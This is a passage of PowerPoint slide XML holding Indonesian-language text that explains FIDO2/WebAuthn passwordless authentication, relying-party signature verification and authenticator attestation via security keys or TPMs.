            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FIDO U2F, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital dan PKI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. FIDO2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>WebAuthn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FIDO U2F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (API) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FIDO U2F juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FIDO2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>WebAuthn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kloning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengesahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FIDO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TPM di PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> laptop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengesahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan ID model. Selama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengesahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengesahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan model yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>properti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang </a:t>
            </a:r>
            <a:r>
